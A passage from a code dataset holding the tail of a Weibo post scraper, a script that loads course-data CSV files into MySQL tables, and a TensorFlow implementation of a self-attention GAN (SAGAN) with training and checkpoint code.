sys.stdout.encoding)\n return info\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_long_weibo(self, weibo_link):\n \"\"\"获取长原创微博\"\"\"\n try:\n selector = self.deal_html(weibo_link)\n info = selector.xpath(\"//div[@class='c']\")[1]\n wb_content = self.deal_garbled(info)\n wb_time = info.xpath(\"//span[@class='ct']/text()\")[0]\n wb_content = wb_content[wb_content.find(\n \":\") + 1:wb_content.rfind(wb_time)]\n return wb_content\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_original_weibo(self, info):\n \"\"\"获取原创微博\"\"\"\n try:\n weibo_content = self.deal_garbled(info)\n weibo_content = weibo_content[:weibo_content.rfind(u\"赞\")]\n a_text = info.xpath(\"div//a/text()\")\n if u\"全文\" in a_text:\n weibo_id = info.xpath(\"@id\")[0][2:]\n weibo_link = \"https://weibo.cn/comment/\" + weibo_id\n wb_content = self.get_long_weibo(weibo_link)\n if wb_content:\n weibo_content = wb_content\n return weibo_content\n except Exception as e:\n print(\"Error: \", e)\n traceback.print_exc()\n\n def get_long_retweet(self, weibo_link):\n \"\"\"获取长转发微博\"\"\"\n try:\n 
wb_content = self.get_long_weibo(weibo_link)\n            wb_content = wb_content[:wb_content.rfind(u\"原文转发\")]\n            return wb_content\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n\n    def get_retweet(self, info):\n        \"\"\"Get a reposted weibo.\"\"\"\n        try:\n            original_user = info.xpath(\"div/span[@class='cmt']/a/text()\")\n            if not original_user:\n                wb_content = u\"转发微博已被删除\"\n                return wb_content\n            else:\n                original_user = original_user[0]\n            wb_content = self.deal_garbled(info)\n            wb_content = wb_content[wb_content.find(\n                \":\") + 1:wb_content.rfind(u\"赞\")]\n            wb_content = wb_content[:wb_content.rfind(u\"赞\")]\n            a_text = info.xpath(\"div//a/text()\")\n            if u\"全文\" in a_text:\n                weibo_id = info.xpath(\"@id\")[0][2:]\n                weibo_link = \"https://weibo.cn/comment/\" + weibo_id\n                wb_content = self.get_long_retweet(weibo_link)\n                if wb_content:\n                    weibo_content = wb_content\n            retweet_reason = self.deal_garbled(info.xpath(\"div\")[-1])\n            retweet_reason = retweet_reason[:retweet_reason.rindex(u\"赞\")]\n            wb_content = (retweet_reason + \"\\n\" + u\"原始用户: \" +\n                          original_user + \"\\n\" + u\"转发内容: \" + wb_content)\n            return wb_content\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n\n    def get_weibo_content(self, info):\n        \"\"\"Get the weibo content.\"\"\"\n        try:\n            is_retweet = info.xpath(\"div/span[@class='cmt']\")\n            if is_retweet:\n                weibo_content = self.get_retweet(info)\n            else:\n                weibo_content = self.get_original_weibo(info)\n            self.weibo[-1]['weibo_content'] = weibo_content\n            print(weibo_content)\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n\n    def get_weibo_place(self, info):\n        \"\"\"Get the location the weibo was published from.\"\"\"\n        try:\n            div_first = info.xpath(\"div\")[0]\n            a_list = div_first.xpath(\"a\")\n            weibo_place = u\"无\"\n            for a in a_list:\n                if (\"place.weibo.com\" in a.xpath(\"@href\")[0] and\n                        a.xpath(\"text()\")[0] == u\"显示地图\"):\n                    weibo_a = div_first.xpath(\"span[@class='ctt']/a\")\n                    if len(weibo_a) >= 1:\n                        weibo_place = weibo_a[-1]\n                        if u\"视频\" == div_first.xpath(\"span[@class='ctt']/a/text()\")[-1][-2:]:\n                            if len(weibo_a) >= 2:\n                                weibo_place = weibo_a[-2]\n                            else:\n                                weibo_place = u\"无\"\n                        weibo_place = self.deal_garbled(weibo_place)\n                    break\n            self.weibo[-1]['weibo_place'] = weibo_place\n            print(u\"微博位置: \" + weibo_place)\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n\n    def get_publish_time(self, info):\n        \"\"\"Get the publish time of the weibo.\"\"\"\n        try:\n            str_time = info.xpath(\"div/span[@class='ct']\")\n            str_time = self.deal_garbled(str_time[0])\n            publish_time = str_time.split(u'来自')[0]\n            if u\"刚刚\" in publish_time:\n                publish_time = datetime.now().strftime(\n                    '%Y-%m-%d %H:%M')\n            elif u\"分钟\" in publish_time:\n                minute = publish_time[:publish_time.find(u\"分钟\")]\n                minute = timedelta(minutes=int(minute))\n                publish_time = (datetime.now() - minute).strftime(\n                    \"%Y-%m-%d %H:%M\")\n            elif u\"今天\" in publish_time:\n                today = datetime.now().strftime(\"%Y-%m-%d\")\n                time = publish_time[3:]\n                publish_time = today + \" \" + time\n            elif u\"月\" in publish_time:\n                year = datetime.now().strftime(\"%Y\")\n                month = publish_time[0:2]\n                day = publish_time[3:5]\n                time = publish_time[7:12]\n                publish_time = (year + \"-\" + month + \"-\" + day + \" \" + time)\n            else:\n                publish_time = publish_time[:16]\n            self.weibo[-1]['publish_time'] = publish_time\n            print(u\"微博发布时间: \" + publish_time)\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n\n    def get_publish_tool(self, info):\n        \"\"\"Get the tool/device the weibo was published from.\"\"\"\n        try:\n            str_time = info.xpath(\"div/span[@class='ct']\")\n            str_time = 
self.deal_garbled(str_time[0])\n            if len(str_time.split(u'来自')) > 1:\n                publish_tool = str_time.split(u'来自')[1]\n            else:\n                publish_tool = u\"无\"\n            self.weibo[-1]['publish_tool'] = publish_tool\n            print(u\"微博发布工具: \" + publish_tool)\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n\n    def get_weibo_footer(self, info):\n        \"\"\"Get the like, repost and comment counts of the weibo.\"\"\"\n        try:\n            pattern = r\"\\d+\"\n            str_footer = info.xpath(\"div\")[-1]\n            str_footer = self.deal_garbled(str_footer)\n            str_footer = str_footer[str_footer.rfind(u'赞'):]\n            weibo_footer = re.findall(pattern, str_footer, re.M)\n\n            up_num = int(weibo_footer[0])\n            self.weibo[-1]['up_num'] = up_num\n            print(u\"点赞数: \" + str(up_num))\n\n            retweet_num = int(weibo_footer[1])\n            self.weibo[-1]['retweet_num'] = retweet_num\n            print(u\"转发数: \" + str(retweet_num))\n\n            comment_num = int(weibo_footer[2])\n            self.weibo[-1]['comment_num'] = comment_num\n            print(u\"评论数: \" + str(comment_num))\n        except Exception as e:\n            print(\"Error: \", e)\n            traceback.print_exc()\n","sub_path":"crawler/spiders/weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":12948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"323560546","text":"import csv,mysql.connector\r\n\r\n\r\nclass CSV_TO_SQL:\r\n\r\n\tdef __init__(self,database):\r\n\t\tself.__database = database\r\n\r\n\tdef insertIntoTable(self,f,course_run,uni):\r\n\t\t\"\"\" \r\n\t\tInserts a csv file into the corresponding MySQL table.\r\n\r\n\t\t:param:\r\n\t\t\tf: The file to be inserted.\r\n\t\t\tcourse_run: The run number.\r\n\t\t\tuni: The University the course belongs to.\r\n\r\n\t\t\"\"\"\r\n\t\t_file = open(f)\r\n\t\t_reader = csv.reader(_file)\r\n\t\thead = next(_reader)\r\n\t\tblank1,blank2,_filename, _extend = f.split('.')\r\n\t\tdots,data,uni,course, otherDeets, datatype = _filename.split(\"/\")\r\n\t\tcursor = self.__database.cursor()\r\n\t\tdelete = ''\r\n\t\tload = ''\r\n\t\r\n\r\n\t\tif 'comments' in datatype:\r\n\t\t\tcol = ''\r\n\t\t\tsetting = ''\r\n\r\n\t\t\t\r\n\t\t\tif(len(head) == 8):\r\n\t\t\t\tcol = \t\"(id,author_id,@parent_id,@step,@text,@timestamp,@moderated,@likes) \"\r\n\t\t\t\tsetting = \"step = @step,week_number = SUBSTRING_INDEX(@step,'.',1),step_number = SUBSTRING_INDEX(@step,'.',-1),\"\\\r\n\t\t\t\t\"text = @text,timestamp = @timestamp,Likes = @Likes, \"''\r\n\r\n\t\t\telse:\r\n\t\t\t\tcol = \"(id,author_id,@parent_id,step,week_number,step_number,text,timestamp,@moderated,likes) \"\r\n\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Comments ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col +\\\r\n\t\t\t\"Set parent_id = nullif(@parent_id,' '), \"+ setting +\"moderated = nullif(@moderated,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\"\r\n\t\t\t\r\n\r\n\t\telif 'enrolments' in datatype:\r\n\t\t\t\r\n\t\t\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Enrolments ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n' \" + \\\r\n\t\t\t'IGNORE 1 LINES ' \\\r\n\t\t\t\"(learner_id,enrolled_at,@unenrolled_at,role,@fully_participated_at,@purchased_statement_at,gender,country,age_range,highest_education_level,employment_status,employment_area) \"\\\r\n\t\t\t\"Set unenrolled_at = nullif(@unenrolled_at,' '),fully_participated_at = nullif(@fully_participated_at,' '),purchased_statement_at = 
nullif(@purchased_statement_at,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\" \r\n\t\t\t\r\n\t\t\t\r\n\t\t\r\n\t\telif 'assignments' in datatype:\t\r\n\r\n\t\t\tcol = \t\"(id,step,step_number,week_number,author_id,text,first_viewed_at,submitted_at,@moderated,review_count) \"\r\n\t\t\t\r\n\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Assignments ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col + \\\r\n\t\t\t\"Set moderated = nullif(@moderated,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\" \r\n\t\t\t\r\n\r\n\t\telif 'reviews' in datatype:\r\n\r\n\t\t\tcol = '(id,step,week_number,step_number,reviewer_id,assignment_id,guideline_one_feedback,guideline_two_feedback,guideline_three_feedback,created_at)'\r\n\t\t\t\t\r\n\r\n\t\t\tload = \t'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Reviews ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + col + \\\r\n\t\t\t\"Set university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\"\r\n\t\t\t\r\n\r\n\t\telif 'question' in datatype:\r\n\r\n\r\n\t\t\tload = \t'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Quiz ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' \\\r\n\t\t\t'IGNORE 1 LINES ' + \"(learner_id,quiz_question,week_number,step_number,question_number,response,submitted_at,@correct)\" +\\\r\n\t\t\t\"Set correct = STRCMP(@correct,'TRUE') + 1, university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\"\r\n\t\t\t\r\n\r\n\t\telif 'activity' in datatype:\r\n\r\n\t\t\tcol = ''\r\n\t\t\tsetting = ''\r\n\t\t\tif(len(head) == 4):\r\n\t\t\t\tcol = '(learner_id,@step,@first_visited_at,@last_completed_at)'\t\t\t\t\r\n\t\t\t\tsetting = \"step = @step, week_number = SUBSTRING_INDEX(@step,'.',1),step_number = SUBSTRING_INDEX(@step,'.',-1),\" \\\r\n\t\t\t\t\" first_visited_at = @first_visited_at, \"\r\n\t\t\telse:\r\n\t\t\t\tcol = '(learner_id,step,week_number,step_number,first_visited_at,@last_completed_at)'\r\n\r\n\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Activity ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' \" \\\r\n\t\t\t\"IGNORE 1 LINES \" + col +\\\r\n\t\t\t\"Set \" + setting + \"last_completed_at = nullif(@last_completed_at,' '),university = \" + \"'\" + uni + \"',\" + \"course = \" + \"'\" + course + \"',\" + \"course_run = \" \\\r\n\t\t\t+ str(course_run) + \";\" \r\n\t\t\r\n\t\telif 'Courses' in datatype:\r\n\r\n\t\t\tcol = '(course_run,start_date,no_of_weeks,joiners,leavers,learners,active_Learners,returning_learners,social_learners,fully_participating_learners,statements_sold,course,run)'\r\n\t\t\tload = 'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE Courses ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' \" \\\r\n\t\t\t\"IGNORE 1 LINES \" + col + \\\r\n\t\t\t\"Set university = \" + \"'\" + uni + \"';\"\r\n\r\n\t\telif 'team-members' in datatype:\r\n\t\t\tcol = '(id,first_name,last_name,team_role,user_role)'\r\n\r\n\t\t\tload = \t'LOAD DATA LOCAL INFILE '\"'\" + f + \"'\"' REPLACE INTO TABLE TeamMembers ' \\\r\n\t\t\t\"FIELDS TERMINATED BY ',' ENCLOSED BY \"+ '\\'\"\\'' 
\\\r\n\t\t\t'IGNORE 1 LINES ' + col +\";\"\r\n\r\n\t\r\n\t\t\t\r\n\t\tcursor.execute(load)\r\n\t\tself.__database.commit()\r\n\t\tcursor.close()\r\n\t\t_file.close()\r\n","sub_path":"update/csvToSQL.py","file_name":"csvToSQL.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"168691760","text":"import tensorflow as tf\r\nfrom tensorflow.contrib.data import shuffle_and_repeat, map_and_batch\r\nimport numpy as np\r\nimport cv2\r\nimport time\r\nfrom layers import *\r\nfrom utils import *\r\n\r\nclass SAGAN():\r\n model_name = \"SAGAN\" # name for ckpt\r\n\r\n def __init__(self, sess, args):\r\n self.sess = sess\r\n self.dataset = args.dataset\r\n\r\n self.epoch = args.epoch\r\n self.batch_size = args.batch_size\r\n self.image_size = args.image_size\r\n self.image_save_freq = args.image_save_freq\r\n self.model_save_freq = args.model_save_freq\r\n\r\n self.sample_num = args.sample_num\r\n self.test_num = args.test_num\r\n\r\n \"\"\" Generator \"\"\"\r\n self.layer_num = int(np.log2(self.image_size)) - 2\r\n self.z_dim = args.z_dim # dimension of noise-vector\r\n self.gan_type = args.gan_type\r\n\r\n \"\"\" Discriminator \"\"\"\r\n self.n_critic = args.n_critic\r\n self.ld = args.ld\r\n\r\n # train\r\n self.g_lr = args.g_lr\r\n self.d_lr = args.d_lr\r\n self.beta1 = args.beta1\r\n self.beta2 = args.beta2\r\n\r\n self.ckpt_dir = args.ckpt_dir\r\n self.result_dir = args.result_dir\r\n self.log_dir = args.log_dir\r\n self.sample_dir = args.sample_dir\r\n\r\n self.sample_dir = os.path.join(self.sample_dir, self.model_dir)\r\n check_folder(self.sample_dir)\r\n\r\n self.ch = 3\r\n path = './dataset/'\r\n self.data_filenames = load_datanames(self.image_size, path+str(self.dataset))\r\n self.data_num = len(self.data_filenames)\r\n\r\n print()\r\n print('----- Information -----')\r\n print('dataset : {}'.format(self.dataset))\r\n print('data_num : {}'.format(self.data_num))\r\n print('epoch : {}'.format(self.epoch))\r\n print('batch_size : {}'.format(self.batch_size))\r\n print('image_size : {}'.format(self.image_size))\r\n\r\n print()\r\n print('----- Generator -----')\r\n print('generator layer num : {}'.format(self.layer_num))\r\n print('gan type : {}'.format(self.gan_type))\r\n print('z_dim : {}'.format(self.z_dim))\r\n\r\n print()\r\n print('----- Discriminator -----')\r\n print('discriminator layer num : {}'.format(self.layer_num))\r\n print('the number of critic : {}'.format(self.n_critic))\r\n print()\r\n\r\n def generator(self, z, is_training=True, trainable=False, reuse=False):\r\n with tf.variable_scope('generator', reuse=reuse):\r\n ch = 512\r\n x = affine(z, num_out=4*4*ch, name='affine')\r\n x = tf.reshape(x, [-1, 4, 4, ch])\r\n\r\n for i in range(self.layer_num//2):\r\n x = deconv2d(x, k_size=4, out_ch=ch//2, stride=2, name='deconv2d_'+str(i))\r\n x = relu(x)\r\n x = batch_norm(x, name='batch_'+str(i), is_training=is_training, trainable=trainable)\r\n\r\n ch = ch // 2\r\n\r\n x = self.attention(x, ch, name='attention', reuse=reuse)\r\n\r\n for i in range(self.layer_num//2, self.layer_num):\r\n x = deconv2d(x, k_size=4, out_ch=ch//2, stride=2, name='deconv2d_'+str(i))\r\n x = relu(x)\r\n x = batch_norm(x, name='batch_'+str(i), is_training=is_training, trainable=trainable)\r\n\r\n ch = ch // 2\r\n\r\n x = conv2d(x, k_size=5, out_ch=self.ch, stride=1, name='G_logit')\r\n x = tanh(x)\r\n\r\n return x\r\n\r\n def discriminator(self, x, reuse=False):\r\n with tf.variable_scope('discriminator', 
reuse=reuse):\r\n ch = 64\r\n x = conv2d(x, k_size=4, out_ch=ch, stride=2, name='conv')\r\n x = lrelu(x, 0.1)\r\n\r\n for i in range(self.layer_num//2):\r\n x = conv2d(x, k_size=4, out_ch=ch*2, stride=2, name='conv_'+str(i))\r\n x = lrelu(x, 0.1)\r\n\r\n ch = ch * 2\r\n\r\n x = self.attention(x, ch, name='attention')\r\n\r\n for i in range(self.layer_num//2, self.layer_num):\r\n x = conv2d(x, k_size=4, out_ch=ch*2, stride=2, name='conv_'+str(i))\r\n x = lrelu(x, 0.1)\r\n\r\n ch = ch * 2\r\n\r\n x = flatten(x)\r\n x = affine(x, num_out=1, name='D_logit')\r\n\r\n return x\r\n\r\n def attention(self, x, ch, name, reuse=False):\r\n with tf.variable_scope(name) as scope:\r\n f = conv2d(x, k_size=1, out_ch=ch//8, stride=1, name='f_conv2d')\r\n g = conv2d(x, k_size=1, out_ch=ch//8, stride=1, name='g_conv2d')\r\n h = conv2d(x, k_size=1, out_ch=ch, stride=1, name='h_conv2d')\r\n\r\n s = tf.matmul(hw_flatten(g), hw_flatten(f), transpose_b=True)\r\n\r\n beta = tf.nn.softmax(s, axis=-1) # attention map\r\n\r\n o = tf.matmul(beta, hw_flatten(h))\r\n gamma = tf.get_variable(\"gamma\", [1], initializer=tf.constant_initializer(0.0))\r\n\r\n o = tf.reshape(o, shape=x.shape)\r\n x = gamma * o + x\r\n\r\n return x\r\n\r\n def gradient_penalty(self, real, fake):\r\n if self.gan_type == 'dragan' :\r\n shape = tf.shape(real)\r\n eps = tf.random_uniform(shape=shape, minval=0., maxval=1.)\r\n x_mean, x_var = tf.nn.moments(real, axes=[0, 1, 2, 3])\r\n x_std = tf.sqrt(x_var) # magnitude of noise decides the size of local region\r\n noise = 0.5 * x_std * eps # delta in paper\r\n\r\n # Author suggested U[0,1] in original paper, but he admitted it is bug in github\r\n # (https://github.com/kodalinaveen3/DRAGAN). It should be two-sided.\r\n\r\n alpha = tf.random_uniform(shape=[shape[0], 1, 1, 1], minval=-1., maxval=1.)\r\n interpolated = tf.clip_by_value(real + alpha * noise, -1., 1.) # x_hat should be in the space of X\r\n\r\n else :\r\n alpha = tf.random_uniform(shape=[self.batch_size, 1, 1, 1], minval=0., maxval=1.)\r\n interpolated = alpha*real + (1. 
- alpha)*fake\r\n\r\n        logit = self.discriminator(interpolated, reuse=True)\r\n\r\n        grad = tf.gradients(logit, interpolated)[0]  # gradient of D(interpolated)\r\n        grad_norm = tf.norm(flatten(grad), axis=1)  # l2 norm\r\n\r\n        GP = 0\r\n\r\n        # WGAN - LP\r\n        if self.gan_type == 'wgan-lp':\r\n            GP = self.ld * tf.reduce_mean(tf.square(tf.maximum(0.0, grad_norm - 1.)))\r\n\r\n        elif self.gan_type == 'wgan-gp' or self.gan_type == 'dragan':\r\n            GP = self.ld * tf.reduce_mean(tf.square(grad_norm - 1.))\r\n\r\n        return GP\r\n\r\n    def discriminator_loss(self, loss_func, real, fake):\r\n        real_loss = 0\r\n        fake_loss = 0\r\n\r\n        if loss_func.__contains__('wgan') :\r\n            real_loss = -tf.reduce_mean(real)\r\n            fake_loss = tf.reduce_mean(fake)\r\n\r\n        if loss_func == 'lsgan' :\r\n            real_loss = tf.reduce_mean(tf.squared_difference(real, 1.0))\r\n            fake_loss = tf.reduce_mean(tf.square(fake))\r\n\r\n        if loss_func == 'gan' or loss_func == 'dragan' :\r\n            real_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.ones_like(real), logits=real))\r\n            fake_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.zeros_like(fake), logits=fake))\r\n\r\n        if loss_func == 'hinge' :\r\n            real_loss = tf.reduce_mean(relu(1.0 - real))\r\n            fake_loss = tf.reduce_mean(relu(1.0 + fake))\r\n\r\n        loss = real_loss + fake_loss\r\n\r\n        return loss\r\n\r\n    def generator_loss(self, loss_func, fake):\r\n        fake_loss = 0\r\n\r\n        if loss_func.__contains__('wgan') :\r\n            fake_loss = -tf.reduce_mean(fake)\r\n\r\n        if loss_func == 'lsgan' :\r\n            fake_loss = tf.reduce_mean(tf.squared_difference(fake, 1.0))\r\n\r\n        if loss_func == 'gan' or loss_func == 'dragan' :\r\n            fake_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=tf.ones_like(fake), logits=fake))\r\n\r\n        if loss_func == 'hinge' :\r\n            fake_loss = -tf.reduce_mean(fake)\r\n\r\n        loss = fake_loss\r\n\r\n        return loss\r\n\r\n    def build_model(self):\r\n        self.inputs = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.ch], name='real_image')\r\n        self.z = tf.placeholder(tf.float32, [self.batch_size, self.z_dim], name='z')\r\n\r\n        real_logits = self.discriminator(self.inputs)\r\n\r\n        fake_images = self.generator(self.z)\r\n        fake_logits = self.discriminator(fake_images, reuse=True)\r\n\r\n        if self.gan_type.__contains__('wgan') or self.gan_type == 'dragan' :\r\n            GP = self.gradient_penalty(real=self.inputs, fake=fake_images)\r\n        else :\r\n            GP = 0\r\n\r\n        # get loss for discriminator\r\n        self.d_loss = self.discriminator_loss(self.gan_type, real=real_logits, fake=fake_logits) + GP\r\n\r\n        # get loss for generator\r\n        self.g_loss = self.generator_loss(self.gan_type, fake=fake_logits)\r\n\r\n        \"\"\" Training \"\"\"\r\n        # divide trainable variables into a group for D and a group for G\r\n        t_vars = tf.trainable_variables()\r\n        d_vars = [var for var in t_vars if 'discriminator' in var.name]\r\n        g_vars = [var for var in t_vars if 'generator' in var.name]\r\n\r\n        # optimizers\r\n        self.d_optim = tf.train.AdamOptimizer(self.d_lr, beta1=self.beta1, beta2=self.beta2).minimize(self.d_loss, var_list=d_vars)\r\n        self.g_optim = tf.train.AdamOptimizer(self.g_lr, beta1=self.beta1, beta2=self.beta2).minimize(self.g_loss, var_list=g_vars)\r\n\r\n        \"\"\" Testing \"\"\"\r\n        # for test\r\n        self.fake_images = self.generator(self.z, is_training=False, reuse=True)\r\n\r\n        \"\"\" Summary \"\"\"\r\n        self.d_sum = tf.summary.scalar(\"d_loss\", self.d_loss)\r\n        self.g_sum = tf.summary.scalar(\"g_loss\", self.g_loss)\r\n\r\n\r\n    
############################################################################\r\n # Train\r\n ############################################################################\r\n\r\n def train(self):\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n self.sample_z = np.random.uniform(0, 1, size=(self.batch_size, self.z_dim))\r\n\r\n self.saver = tf.train.Saver()\r\n\r\n self.writer = tf.summary.FileWriter(self.log_dir + '/' + self.model_dir, self.sess.graph)\r\n\r\n # The number of training iterations\r\n iteration = self.data_num // self.batch_size\r\n\r\n # restore the ckpt if it exists\r\n could_load, ckpt_counter = self.load(self.ckpt_dir)\r\n if could_load:\r\n start_epoch = ckpt_counter // iteration\r\n start_batch_id = ckpt_counter - start_epoch * iteration\r\n counter = ckpt_counter\r\n print('[*] ckpt exists. Resuming training from the checkpoint.')\r\n else:\r\n start_epoch = 0\r\n start_batch_id = 0\r\n counter = 1\r\n print('[*] ckpt does not exist. Starting training from the beginning.')\r\n\r\n past_g_loss = -1.0\r\n for epoch in range(start_epoch, self.epoch):\r\n for idx in range(start_batch_id, iteration):\r\n start_time = time.time()\r\n\r\n # batch inputs\r\n mask = np.random.choice(self.data_num, size=self.batch_size, replace=False)\r\n filename_batch = self.data_filenames[mask]\r\n image_batch = np.empty((self.batch_size, self.image_size, self.image_size, self.ch), dtype=np.float32) # float32, not uint8: the images are normalized to [-1, 1] below\r\n for i_no, bf in enumerate(filename_batch):\r\n img = cv2.imread(bf)\r\n img = cv2.resize(img, (self.image_size, self.image_size))\r\n img = img.astype(np.float32) / 127.5 - 1.0\r\n\r\n image_batch[i_no] = img\r\n\r\n z_batch = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))\r\n\r\n train_feed_dict = {self.inputs: image_batch, self.z: z_batch}\r\n\r\n # update D network\r\n _, summary_str, d_loss = self.sess.run([self.d_optim, self.d_sum, self.d_loss], feed_dict=train_feed_dict)\r\n self.writer.add_summary(summary_str, counter)\r\n\r\n # update G network\r\n g_loss = None\r\n if (counter - 1) % self.n_critic == 0:\r\n _, summary_str, g_loss = self.sess.run([self.g_optim, self.g_sum, self.g_loss], feed_dict=train_feed_dict)\r\n self.writer.add_summary(summary_str, counter)\r\n past_g_loss = g_loss\r\n\r\n # display training status\r\n counter += 1\r\n if g_loss is None:\r\n g_loss = past_g_loss\r\n print('epoch: [{: 02}] [{:04} / {:04}], time: {:6.3f}, d_loss: {: 8.3f}, g_loss: {: 8.3f}'\r\n .format(epoch, idx, iteration, time.time() - start_time, d_loss, g_loss))\r\n\r\n # save training results for every self.image_save_freq steps\r\n if (idx+1) % self.image_save_freq == 0:\r\n samples = self.sess.run(self.fake_images, feed_dict={self.z: self.sample_z})\r\n tot_num_samples = min(self.sample_num, self.batch_size)\r\n manifold_h = int(np.floor(np.sqrt(tot_num_samples)))\r\n manifold_w = int(np.floor(np.sqrt(tot_num_samples)))\r\n save_images(samples[:manifold_h * manifold_w, :, :, :],\r\n [manifold_h, manifold_w],\r\n './' + self.sample_dir + '/' + self.model_name + '_train_{:02d}_{:04d}.png'.format(epoch, idx+1))\r\n\r\n if (idx+1) % self.model_save_freq == 0:\r\n self.save(self.ckpt_dir, counter)\r\n\r\n # After an epoch, start_batch_id is set to zero\r\n # non-zero value is only for the first epoch after loading pre-trained model\r\n start_batch_id = 0\r\n\r\n # save model\r\n self.save(self.ckpt_dir, counter)\r\n\r\n # show temporal results\r\n # self.visualize_results(epoch)\r\n\r\n # save model for final step\r\n self.save(self.ckpt_dir, counter)\r\n\r\n def visualize_results(self, 
epoch):\r\n tot_num_samples = min(self.sample_num, self.batch_size)\r\n image_frame_dim = int(np.floor(np.sqrt(tot_num_samples)))\r\n\r\n \"\"\" random condition, random noise \"\"\"\r\n\r\n z_sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))\r\n\r\n samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample})\r\n\r\n save_images(samples[:image_frame_dim * image_frame_dim, :, :, :], [image_frame_dim, image_frame_dim],\r\n self.sample_dir + '/' + self.model_name + '_epoch%02d' % epoch + '_visualize.png')\r\n\r\n\r\n ############################################################################\r\n # Test\r\n ############################################################################\r\n\r\n def test(self):\r\n tf.global_variables_initializer().run()\r\n\r\n self.saver = tf.train.Saver()\r\n could_load, ckpt_counter = self.load(self.ckpt_dir)\r\n result_dir = os.path.join(self.result_dir, self.model_dir)\r\n check_folder(result_dir)\r\n\r\n if could_load:\r\n print(\"[*] Load SUCCESS\")\r\n else:\r\n print(\"[!] Load failed...\")\r\n\r\n tot_num_samples = min(self.sample_num, self.batch_size)\r\n image_frame_dim = int(np.floor(np.sqrt(tot_num_samples)))\r\n\r\n \"\"\" random condition, random noise \"\"\"\r\n\r\n for i in range(self.test_num) :\r\n z_sample = np.random.uniform(-1, 1, size=(self.batch_size, self.z_dim))\r\n\r\n samples = self.sess.run(self.fake_images, feed_dict={self.z: z_sample})\r\n\r\n save_images(samples[:image_frame_dim * image_frame_dim, :, :, :],\r\n [image_frame_dim, image_frame_dim],\r\n result_dir + '/' + self.model_name + '_test_{}.png'.format(i))\r\n\r\n\r\n @property\r\n def model_dir(self):\r\n return \"{}_{}_{}_{}_{}_{}\".format(\r\n self.model_name, self.gan_type, self.dataset, self.image_size, self.z_dim, self.layer_num)\r\n\r\n def save(self, ckpt_dir, step):\r\n ckpt_dir = os.path.join(ckpt_dir, self.model_dir)\r\n\r\n if not os.path.exists(ckpt_dir):\r\n os.makedirs(ckpt_dir)\r\n\r\n self.saver.save(self.sess, os.path.join(ckpt_dir, self.model_name+'.model'), global_step=step)\r\n\r\n def load(self, ckpt_dir):\r\n import re\r\n print(\"[*] Reading ckpts...\")\r\n ckpt_dir = os.path.join(ckpt_dir, self.model_dir)\r\n\r\n ckpt = tf.train.get_checkpoint_state(ckpt_dir)\r\n if ckpt and ckpt.model_checkpoint_path:\r\n ckpt_name = os.path.basename(ckpt.model_checkpoint_path)\r\n self.saver.restore(self.sess, os.path.join(ckpt_dir, ckpt_name))\r\n counter = int(next(re.finditer(\"(\\d+)(?!.*\\d)\",ckpt_name)).group(0))\r\n print(\"[*] Successfully read {}\".format(ckpt_name))\r\n return True, counter\r\n else:\r\n print(\"[*] Failed to find a ckpt\")\r\n return False, 